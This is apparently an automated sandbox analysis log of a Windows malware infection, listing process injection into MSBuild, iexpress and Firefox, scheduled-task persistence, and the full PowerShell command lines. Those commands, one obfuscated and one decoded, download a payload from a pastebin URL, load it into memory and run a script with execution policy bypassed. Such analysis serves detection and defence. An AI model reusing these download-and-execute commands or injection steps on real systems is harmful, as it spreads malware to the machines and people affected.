                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtClose: Direct from: 0x77D62B6C
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D63C9CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationProcess: Direct from: 0x77D62C5CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtProtectVirtualMemory: Direct from: 0x77D62F9CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtNotifyChangeKey: Direct from: 0x77D63C2CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtWriteVirtualMemory: Direct from: 0x77D62E3CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateMutant: Direct from: 0x77D635CCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtResumeThread: Direct from: 0x77D636ACJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtMapViewOfSection: Direct from: 0x77D62D1CJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D62BFCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtAllocateVirtualMemory: Direct from: 0x77D62BECJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtSetInformationThread: Direct from: 0x77D62ECCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtQueryInformationToken: Direct from: 0x77D62CACJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtCreateFile: Direct from: 0x77D62FECJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenFile: Direct from: 0x77D62DCCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtTerminateThread: Direct from: 0x77D62FCCJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeNtOpenKeyEx: Direct from: 0x77D62B9CJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: execute and read and writeJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: NULL target: C:\Windows\SysWOW64\iexpress.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\iexpress.exeThread register set: target process: 5468Jump to behavior
                  Queues an APC in another process (thread injection)
                  Source: C:\Windows\SysWOW64\iexpress.exeThread APC queued: target process: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1279008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /fJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutosJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeProcess created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?ho?rgbl?ge?qq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?bgbh?ee?zwbk?gm?v?bh?cc?i??7?cq?sqbl?h??rwbr?c??pq?g?cg?i?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?ds?j?b3?gu?ygbd?gw?aqbl?g4?d??g?d0?i?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??uwb5?hm?d?bl?g0?lgbo?gu?d??u?fc?zqbi?em?b?bp?gu?bgb0?c??ow?k?fi?vgbv?fg?dg?g?d0?i??k?hc?zqbi?em?b?bp?gu?bgb0?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?i??k?ho?rgbl?ge?qq?g?ck?i??7?cq?ugbw?fu?w?b2?c??f??g?e8?dqb0?c0?rgbp?gw?zq?g?c0?rgbp?gw?zqbq?ge?d?bo?c??j?bj?gu?c?bh?fe?i??t?eu?bgbj?g8?z?bp?g4?zw?g?cc?vqbu?ey?o??n?c??lqbm?g8?cgbj?gu?i??7?cq?uwbu?gy?rwbs?c??pq?g?cg?i?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??y?c4?d?b4?hq?jw?p?c??ow?k?f??a?by?gw?tg?g?d0?i?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??uwb5?hm?d?bl?g0?lgbo?gu?d??u?fc?zqbi?em?b?bp?gu?bgb0?c??ow?k?f??a?by?gw?tg?u?eu?bgbj?g8?z?bp?g4?zw?g?d0?i?bb?fm?eqbz?hq?zqbt?c4?v?bl?hg?d??u?eu?bgbj?g8?z?bp?g4?zwbd?do?ogbv?fq?rg?4?c??ow?k?eq?s?b6?fu?qq?g?c??pq?g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?ek?zqbw?ec?uq?g?ck?i??7?cq?dqbu?gw?s?b6?c??pq?g?cq?u?bo?hi?b?bo?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?i??k?eq?s?b6?fu?qq?g?ck?i??7?cq?dqbu?gw?s?b6?c??f??g?e8?dqb0?c0?rgbp?gw?zq?g?c0?rgbp?gw?zqbq?ge?d?bo?c??j?bt?fq?zgbh?gw?i??t?gy?bwby?gm?zq?g?ds?j?bn?e8?r?bs?gc?i??9?c??i??n?cq?cgb5?ge?zqbh?c??pq?g?cg?rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??jw?n?cc?i??r?c??j?bt?fq?zgbh?gw?i??r?c??jw?n?cc?i??t?eu?bgbj?g8?z?bp?g4?zw?g?fu?v?bg?dg?kq?7?cc?i??7?cq?tqbp?eq?ugbn?c??kw?9?c??jwbb?ei?eqb0?gu?wwbd?f0?i??k?ey?eqbm?gq?eg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?hi?eqbh?gu?rw?u?hi?zqbw?gw?yqbj?gu?k??n?cc?j??k?cq?j??n?cc?l??n?cc?qq?n?cc?kq?g?ck?i??7?cc?i??7?cq?tqbp?eq?ugbn?c??kw?9?c??jwbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?cc?i??r?c??jw?6?em?dqby?hi?zqbu?hq?r?bv?g0?yqbp?g4?lgbm?g8?yqbk?cg?i??k?ey?eqbm?gq?eg?g?ck?lg?n?c??ow?k?e0?twbe?fi?zw?g?cs?pq?g?cc?rwbl?hq?v?b5?h??zq?o?c??jw?n?e0?aqbz?gu?cgbp?gm?bwby?gq?aqbv?hm?bwbb?g0?zqbu?c4?qwbs?ge?cwbz?de?jw?n?c??kq?u?ec?zqb0?e0?jw?g?ds?j?bn?e8?r?bs?gc?i??r?d0?i??n?gu?d?bo?g8?z??o?c??jw?n?e0?cwbx?ei?sqbi?fk?jw?n?c??kq?u?ek?bgb2?g8?awbl?cg?i??k?g4?dqbs?gw?i??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?i??n?cc?m??v?fq?ugb4?e8?r?ba?dk?n??v?hi?lwbl?gu?lgbl?hq?cwbh?h??lw?v?do?cwbw?hq?d?bo?cc?jw?g?cw?i??n?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?cc?i??s?c??jw?n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$zfkaa = 'https://pastebin.com/raw/naagdctg' ;$iepgq = ( [system.io.path]::gettemppath() + 'dll01.txt');$webclient = new-object system.net.webclient ;$rvuxv = $webclient.downloadstring( $zfkaa ) ;$rvuxv | out-file -filepath $iepgq -encoding 'utf8' -force ;$stfgl = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$phrln = new-object system.net.webclient ;$phrln.encoding = [system.text.encoding]::utf8 ;$dhzua = ( get-content -path $iepgq ) ;$utlhz = $phrln.downloadstring( $dhzua ) ;$utlhz | out-file -filepath $stfgl -force ;$modrg = '$ryaeg = (get-content -path ''' + $stfgl + ''' -encoding utf8);' ;$modrg += '[byte[]] $fyfdz = [system.convert]::frombase64string( $ryaeg.replace(''$$$$'',''a'') ) ;' ;$modrg += '[system.appdomain]:' + ':currentdomain.load( $fyfdz ).' ;$modrg += 'gettype( ''misericordiosoamen.class1'' ).getm' ;$modrg += 'ethod( ''msqbiby'' ).invoke( $null , [object[]] ( ''0/trxodz94/r/ee.etsap//:sptth'' , ''c:\windows\system32\purchase okk.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''roda'' ) ) ;' ;$vbwwz = ( [system.io.path]::gettemppath() + 'dll03.ps1' ) ;$modrg | out-file -filepath $vbwwz -force ;powershell -executionpolicy bypass -file $vbwwz ;"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?ho?rgbl?ge?qq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?bgbh?ee?zwbk?gm?v?bh?cc?i??7?cq?sqbl?h??rwbr?c??pq?g?cg?i?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?ds?j?b3?gu?ygbd?gw?aqbl?g4?d??g?d0?i?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??uwb5?hm?d?bl?g0?lgbo?gu?d??u?fc?zqbi?em?b?bp?gu?bgb0?c??ow?k?fi?vgbv?fg?dg?g?d0?i??k?hc?zqbi?em?b?bp?gu?bgb0?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?i??k?ho?rgbl?ge?qq?g?ck?i??7?cq?ugbw?fu?w?b2?c??f??g?e8?dqb0?c0?rgbp?gw?zq?g?c0?rgbp?gw?zqbq?ge?d?bo?c??j?bj?gu?c?bh?fe?i??t?eu?bgbj?g8?z?bp?g4?zw?g?cc?vqbu?ey?o??n?c??lqbm?g8?cgbj?gu?i??7?cq?uwbu?gy?rwbs?c??pq?g?cg?i?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??y?c4?d?b4?hq?jw?p?c??ow?k?f??a?by?gw?tg?g?d0?i?bo?gu?dw?t?e8?ygbq?gu?ywb0?c??uwb5?hm?d?bl?g0?lgbo?gu?d??u?fc?zqbi?em?b?bp?gu?bgb0?c??ow?k?f??a?by?gw?tg?u?eu?bgbj?g8?z?bp?g4?zw?g?d0?i?bb?fm?eqbz?hq?zqbt?c4?v?bl?hg?d??u?eu?bgbj?g8?z?bp?g4?zwbd?do?ogbv?fq?rg?4?c??ow?k?eq?s?b6?fu?qq?g?c??pq?g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?ek?zqbw?ec?uq?g?ck?i??7?cq?dqbu?gw?s?b6?c??pq?g?cq?u?bo?hi?b?bo?c4?r?bv?hc?bgbs?g8?yqbk?fm?d?by?gk?bgbn?cg?i??k?eq?s?b6?fu?qq?g?ck?i??7?cq?dqbu?gw?s?b6?c??f??g?e8?dqb0?c0?rgbp?gw?zq?g?c0?rgbp?gw?zqbq?ge?d?bo?c??j?bt?fq?zgbh?gw?i??t?gy?bwby?gm?zq?g?ds?j?bn?e8?r?bs?gc?i??9?c??i??n?cq?cgb5?ge?zqbh?c??pq?g?cg?rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??jw?n?cc?i??r?c??j?bt?fq?zgbh?gw?i??r?c??jw?n?cc?i??t?eu?bgbj?g8?z?bp?g4?zw?g?fu?v?bg?dg?kq?7?cc?i??7?cq?tqbp?eq?ugbn?c??kw?9?c??jwbb?ei?eqb0?gu?wwbd?f0?i??k?ey?eqbm?gq?eg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?hi?eqbh?gu?rw?u?hi?zqbw?gw?yqbj?gu?k??n?cc?j??k?cq?j??n?cc?l??n?cc?qq?n?cc?kq?g?ck?i??7?cc?i??7?cq?tqbp?eq?ugbn?c??kw?9?c??jwbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?cc?i??r?c??jw?6?em?dqby?hi?zqbu?hq?r?bv?g0?yqbp?g4?lgbm?g8?yqbk?cg?i??k?ey?eqbm?gq?eg?g?ck?lg?n?c??ow?k?e0?twbe?fi?zw?g?cs?pq?g?cc?rwbl?hq?v?b5?h??zq?o?c??jw?n?e0?aqbz?gu?cgbp?gm?bwby?gq?aqbv?hm?bwbb?g0?zqbu?c4?qwbs?ge?cwbz?de?jw?n?c??kq?u?ec?zqb0?e0?jw?g?ds?j?bn?e8?r?bs?gc?i??r?d0?i??n?gu?d?bo?g8?z??o?c??jw?n?e0?cwbx?ei?sqbi?fk?jw?n?c??kq?u?ek?bgb2?g8?awbl?cg?i??k?g4?dqbs?gw?i??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?i??n?cc?m??v?fq?ugb4?e8?r?ba?dk?n??v?hi?lwbl?gu?lgbl?hq?cwbh?h??lw?v?do?cwbw?hq?d?bo?cc?jw?g?cw?i??n?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?cc?i??s?c??jw?n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$zfkaa = 'https://pastebin.com/raw/naagdctg' ;$iepgq = ( [system.io.path]::gettemppath() + 'dll01.txt');$webclient = new-object system.net.webclient ;$rvuxv = $webclient.downloadstring( $zfkaa ) ;$rvuxv | out-file -filepath $iepgq -encoding 'utf8' -force ;$stfgl = ( [system.io.path]::gettemppath() + 'dll02.txt') ;$phrln = new-object system.net.webclient ;$phrln.encoding = [system.text.encoding]::utf8 ;$dhzua = ( get-content -path $iepgq ) ;$utlhz = $phrln.downloadstring( $dhzua ) ;$utlhz | out-file -filepath $stfgl -force ;$modrg = '$ryaeg = (get-content -path ''' + $stfgl + ''' -encoding utf8);' ;$modrg += '[byte[]] $fyfdz = [system.convert]::frombase64string( $ryaeg.replace(''$$$$'',''a'') ) ;' ;$modrg += '[system.appdomain]:' + ':currentdomain.load( $fyfdz ).' 